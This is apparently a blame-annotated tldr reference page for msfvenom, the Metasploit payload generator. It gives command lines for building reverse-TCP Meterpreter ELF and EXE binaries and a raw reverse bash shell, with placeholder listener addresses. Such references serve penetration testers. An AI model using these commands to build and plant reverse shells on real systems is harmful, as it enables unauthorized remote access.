2025-03-14 21:59:59 -06:00
|
|
|
# msfvenom
|
|
|
|
|
|
|
|
|
|
> Manually generate payloads for metasploit.
|
2025-05-08 12:26:01 -06:00
|
|
|
> More information: <https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html>.
|
2025-03-14 21:59:59 -06:00
|
|
|
|
|
|
|
|
- List payloads:
|
|
|
|
|
|
2025-05-08 12:26:01 -06:00
|
|
|
`msfvenom {{[-l|--list]}} payloads`
|
2025-03-14 21:59:59 -06:00
|
|
|
|
|
|
|
|
- List formats:
|
|
|
|
|
|
2025-05-08 12:26:01 -06:00
|
|
|
`msfvenom {{[-l|--list]}} formats`
|
2025-03-14 21:59:59 -06:00
|
|
|
|
|
|
|
|
- Show payload options:
|
|
|
|
|
|
2025-05-08 12:26:01 -06:00
|
|
|
`msfvenom {{[-p|--payload]}} {{payload}} --list-options`
|
2025-03-14 21:59:59 -06:00
|
|
|
|
|
|
|
|
- Create an ELF binary with a reverse TCP handler:
|
|
|
|
|
|
2025-05-08 12:26:01 -06:00
|
|
|
`msfvenom {{[-p|--payload]}} linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} {{[-f|--format]}} elf {{[-o|--out]}} {{path/to/binary}}`
|
2025-03-14 21:59:59 -06:00
|
|
|
|
|
|
|
|
- Create an EXE binary with a reverse TCP handler:
|
|
|
|
|
|
2025-05-08 12:26:01 -06:00
|
|
|
`msfvenom {{[-p|--payload]}} windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} {{[-f|--format]}} exe {{[-o|--out]}} {{path/to/binary.exe}}`
|
2025-03-14 21:59:59 -06:00
|
|
|
|
|
|
|
|
- Create a raw Bash with a reverse TCP handler:
|
|
|
|
|
|
2025-05-08 12:26:01 -06:00
|
|
|
`msfvenom {{[-p|--payload]}} cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} {{[-f|--format]}} raw`
|